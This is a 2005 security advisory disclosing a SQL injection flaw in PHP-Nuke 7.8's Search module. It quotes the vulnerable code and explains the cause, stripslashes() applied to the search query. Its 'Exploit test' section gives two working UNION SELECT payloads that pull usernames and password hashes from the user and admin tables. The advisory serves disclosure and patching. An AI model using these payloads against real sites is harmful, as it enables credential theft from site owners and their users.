Critical SQL Injection PHPNuke <= 7.8
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
SecurityAlert SA027
Author: sp3x
GPG: http://securityreason.com/key/sp3x.gpg
Date: 15. November 2005
Affected software :
===================
PHPNuke version : 7.8 with all security fixes/patches
Not Affected software :
=======================
PHPNuke version : 7.9 + patch 3.1
Description :
=============
PHP-Nuke is a Web Portal System, storytelling software, News system, online
community or whatever you want to call it. The goal of PHP-Nuke is to have an
automated web site to distribute news and articles with users system. Each user
can submit comments to discuss the articles, just similar to Slashdot and many
others. Main features include: web based admin, surveys, top page, access stats
page with counter, user customizable box, themes manager for registered users,
friendly administration GUI with graphic topic manager, option to edit or
delete stories, option to delete comments, moderation system, Referers page to
know who link us, sections manager, customizable HTML blocks, user and authors
edit, an integrated Banners Ads system, search engine, backend/headlines
generation (RSS/RDF format), and many, many more friendly functions. PHP-Nuke
is written 100% in PHP and requires Apache Web server, PHP and a SQL (MySQL,
mSQL, PostgreSQL, ODBC, ODBC_Adabas, Sybase or Interbase).
Support for 25 languages, Yahoo like search engine, Comments option in Polls,
lot of themes, Ephemerids manager, File Manager, Headlines, download manager,
faq manager, advanced blocks systems, reviews system, newsletter, categorized
articles, multilanguage content management, phpBB Forums included and a lot
more.
Vulnerabilities :
*****************
Critical SQL injection :
==========================
IN module called "Search" there exists SQL Injection bug, which can lead to
stealing admin`s username and password md5 and also some sensitive data from
database.
The problem exist in index.php so first let's see the source code of this file.
Original code from index.php :
- ---------------------------------
...
$query = stripslashes(check_html($query, "nohtml"));
if ($type=="stories" OR !$type) {
if ($category > 0) {
$categ = "AND catid='$category' ";
} else {
$categ = "";
}
$q = "select s.sid, s.aid, s.informant, s.title,
s.time, s.hometext, s.bodytext, a.url, s.comments, s.topic from
".$prefix."_stories s, ".$prefix."_authors a where s.aid=a.aid $queryalang
$categ";
if (isset($query)) $q .= "AND (s.title LIKE '%$query%'
OR s.hometext LIKE '%$query%' OR s.bodytext LIKE '%$query%' OR s.notes LIKE
'%$query%') ";
if (!empty($author)) $q .= "AND s.aid='$author' ";
if (!empty($topic)) $q .= "AND s.topic='$topic' ";
if (!empty($days) && $days!=0) $q .= "AND
TO_DAYS(NOW()) - TO_DAYS(time) <= '$days' ";
$q .= " ORDER BY s.time DESC LIMIT $min,$offset";
$t = $topic;
$result5 = $db->sql_query($q);
$nrows = $db->sql_numrows($result5);
....
- -----------------------------------
Here we can see that there is stripslashes() used on $query variable .
Using stripslashes(); before mysql statment lead to critical Sql Injection
attack.
This Sql Injection will work in every type of Search .
Here i mean :
type=="stories"
type=="comments"
type=="reviews"
type=="users"
And also will work when is_active("Downloads") , is_active("Web_Links") or
is_active("Encyclopedia").
So we have here about 7 Critical SQL injections.
Exploit test :
- --------------
Enter this into Search field :
s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM
nuke_users/* -> users passwords and logins
s%') UNION SELECT 0,pwd,name,aid,0,0,0,0,0,0 FROM nuke_authors/* ->
nuke_authors passwords and logins
Exploit :
- ---------
http://securityreason.com/achievement_exploitalert/5
How to fix :
============
Download the new version of the script or update.
http://securityreason.com/patch/6
Greets :
========
Special greets : cXIb8O3 , pkw, pi3, p_e_a and others .
Contact :
=========
sp3x[at]securityreason[dot].com
www.securityreason.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.7 (GNU/Linux)
iD8DBQFDedrRhaZ93YsJSwQRArwUAKCaSKtt8nqY66P3xazISfls+1VfoACglrMU
yDQ955aOQpjnDMqXPvClE/I=
=+sx9
-----END PGP SIGNATURE-----